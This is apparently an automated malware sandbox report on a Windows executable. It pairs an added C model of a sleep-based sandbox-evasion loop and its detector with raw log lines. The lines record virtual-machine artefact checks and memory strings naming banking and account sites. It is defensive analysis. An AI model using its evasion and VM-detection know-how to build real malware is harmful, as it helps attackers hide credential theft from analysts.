Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Window / User API: threadDelayed 2093
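The descending series above (600000, 599875, 599766 ... in steps of roughly 110 ms, with 7749 and 2093 calls on one thread) is the pattern a program produces when it sleeps for the time remaining until a fixed deadline and, on waking early, re-reads the clock and sleeps again: a sandbox that shortens sleeps lets only a little wall-clock time pass per call, so every requested duration is slightly smaller than the previous one. That reading of the numbers is an inference, not something the report states. The C program below is an added model of such a loop with an injectable clock, plus a small heuristic that recognises the series in a list of sleep durations; it is not the sample's code, and the 10-minute deadline, the 110 ms step and the four-value series taken from the list above are constructed inputs.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef uint64_t (*clock_fn)(void *ctx);              /* milliseconds since start */
typedef void     (*sleep_fn)(void *ctx, uint64_t ms); /* request a sleep of ms */

/* Deadline-based wait as a sample would implement it: sleep for the time
 * remaining until deadline_ms and, on waking early, re-read the clock and
 * sleep again. Trusting the clock rather than the sleep call is what makes
 * this resistant to sleep skipping. Returns the number of sleep calls made;
 * max_calls is a safety cap for the simulation. */
uint64_t wait_until_deadline(uint64_t deadline_ms, clock_fn now, sleep_fn sleep_for,
                             void *ctx, uint64_t max_calls) {
    uint64_t calls = 0;
    while (calls < max_calls) {
        uint64_t t = now(ctx);
        if (t >= deadline_ms) break;
        sleep_for(ctx, deadline_ms - t);
        calls++;
    }
    return calls;
}

/* Model of a sandbox that shortens sleeps: instead of honouring the request
 * it advances a fake clock by a fixed step. step_ms = 110 is a constructed
 * value chosen to resemble the spacing of the values in the report. */
#define KEEP 16
typedef struct {
    uint64_t fake_now_ms;
    uint64_t step_ms;
    uint64_t requested[KEEP];   /* first KEEP requested durations */
    uint64_t n_requested;       /* total number of sleep requests */
} sandbox_t;

static uint64_t sandbox_now(void *ctx) { return ((sandbox_t *)ctx)->fake_now_ms; }

static void sandbox_sleep(void *ctx, uint64_t ms) {
    sandbox_t *sb = (sandbox_t *)ctx;
    if (sb->n_requested < KEEP) sb->requested[sb->n_requested] = ms;
    sb->n_requested++;
    sb->fake_now_ms += sb->step_ms;  /* the sleep is "skipped": only step_ms pass */
}

/* Run the loop against the sandbox model and return the recorded state. */
sandbox_t simulate(uint64_t deadline_ms, uint64_t step_ms) {
    sandbox_t sb = { 0, step_ms, { 0 }, 0 };
    wait_until_deadline(deadline_ms, sandbox_now, sandbox_sleep, &sb, 1000000);
    return sb;
}

/* Detection heuristic over a list of requested sleep durations (such as the
 * "Thread delayed" values in the report): strictly decreasing by a small,
 * bounded step is the fingerprint of a deadline-polling loop. */
int looks_like_deadline_polling(const uint64_t *req, size_t n, uint64_t max_step_ms) {
    if (n < 3) return 0;
    for (size_t i = 1; i < n; i++) {
        if (req[i] >= req[i - 1] || req[i - 1] - req[i] > max_step_ms) return 0;
    }
    return 1;
}

int main(void) {
    sandbox_t sb = simulate(600000, 110);   /* 10-minute deadline, 110 ms per skipped sleep */
    printf("%llu sleep calls; first requests:", (unsigned long long)sb.n_requested);
    for (size_t i = 0; i < 5; i++) printf(" %llu", (unsigned long long)sb.requested[i]);
    printf("\n");
    /* constructed from the first four values listed in the report */
    const uint64_t from_report[] = { 600000, 599875, 599766, 599656 };
    printf("report series looks like deadline polling: %d\n",
           looks_like_deadline_polling(from_report, 4, 1000));
    return 0;
}
```

Skipping the sleep on its own does not help a sandbox against this loop: the clock the sample polls (GetTickCount, QueryPerformanceCounter, the system time) has to be advanced by the skipped amount as well, or the loop simply re-issues the wait until the analysis timeout expires.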
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep count: 40 > 30
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096 | Thread sleep count: 7749 > 30
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096 | Thread sleep count: 2093 > 30
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599438s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599313s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599188s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -599063s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598952s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598844s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598719s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598609s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598500s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598389s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598281s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598172s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -598063s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597938s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597828s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597719s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597594s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597484s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597374s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597266s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597156s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -597047s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596938s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596813s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596594s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596469s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596358s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596250s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596141s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -596031s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595922s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595813s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595688s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595578s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595469s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595344s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595234s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -595105s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -594946s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -594842s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -594734s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -594625s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -594515s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884 | Thread sleep time: -594406s >= -30000s
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_004065DA FindFirstFileW,FindClose
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_00402868 FindFirstFileW
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599766
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599547
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599438
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599313
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599188
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599063
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598952
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598844
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598719
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598609
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598500
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598389
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598281
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598172
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598063
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597938
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597828
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597719
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597594
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597484
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597374
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597266
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597156
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597047
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596938
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596813
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596703
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596594
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596469
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596358
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596250
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596141
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596031
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595922
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595813
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595688
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595578
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595469
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595344
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595234
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595105
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594946
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594842
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594734
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594625
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594515
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594406
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: Vmwaretrat
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: vboxservice
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q#C:\windows\System32\vboxservice.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D98000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: Vmwareuser
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vboxtray
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: Vmtoolsd
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | API call chain: ExitProcess graph end node (graph_0-4347)
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | API call chain: ExitProcess graph end node (graph_0-4502)
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Memory allocated: page read and write | page guard
